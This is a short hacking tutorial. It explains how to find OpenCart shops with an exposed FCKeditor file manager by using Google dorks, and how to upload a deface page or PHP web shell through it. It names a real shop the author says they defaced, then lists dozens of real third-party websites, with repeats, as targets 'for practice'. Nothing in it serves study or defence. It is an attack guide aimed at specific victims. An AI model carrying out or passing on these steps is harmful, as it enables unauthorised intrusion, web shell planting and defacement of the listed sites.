- open Google.com and enter Dork:
inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
inurl:Powered By OpenCart
You'll Got a lot of websites by google, select anyone ... For Example i got this one
http://www.schoolshopper.com.au/
Then i'll will simply add the vulnerability URL after the website
Example
http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
(The path may be changed in other Website , Example site.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)
Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)
and Now see file upload option and upload your deface or shell
and Now see file upload option and upload your deface or shell
and for checking shell or deface check this url
- www.site.com/deface.html
- or
- www.site.com/shell.php
I have uploaded xd.html here so you can check http://www.schoolshopper.com.au/xd.html
FOR PRACTICE..
- http://ruthsgarden.com/jaihind.html
- http://www.utahflowers.net/jaihind.html
- http://www.eesnet.org/jaihind.html
- http://bestonlinediscounts.net/
- http://wenrestaurant.com/
- http://ruthsgarden.com/
- http://www.utahflowers.net/
- http://www.inlove.my/
- http://megamall.com.pk/
- http://stefanyboutique.com/
- http://www.virtualgeorge.info/
- http://iphoneclone.biz/
- http://amourcristallis.com/
- http://www.eesnet.org/
- http://www.schoolshopper.com.au/
- http://www.mymaxi.nl/
- http://wiretek.net/
- http://shop.tjokgus.com/
- http://www.aquariumsystem.it/
- http://uae-shopper.com/
- http://organicjewelries.com/
- http://www.granmasantiques.com/
- http://avocadogenie.com/
- http://www.inputandanalysis.com
- http://eddiegifts.com/
- http://bestonlinediscounts.net/
- http://wenrestaurant.com/
- http://ruthsgarden.com/
- http://www.utahflowers.net?/
- http://www.inlove.my/
- http://megamall.com.pk/
- http://stefanyboutique.com?/
- http://www.inputandanalysis.com/
- http://www.virtualgeorge.info/
- http://iphoneclone.biz/
- http://amourcristallis.com?/
- http://www.eesnet.org/
- http://www.schoolshopper.com.au/
- http://www.mymaxi.nl/
- http://wiretek.net/
- http://shop.tjokgus.com/
- http://www.aquariumsystem.it/
- http://uae-shopper.com/
- http://organicjewelries.com/
- http://www.granmasantiques.com/
- http://avocadogenie.com/
- http://www.inputandanalysis.com/
- http://www.utahflowers.net/
- http://stefanyboutique.com/
- http://amourcristallis.com/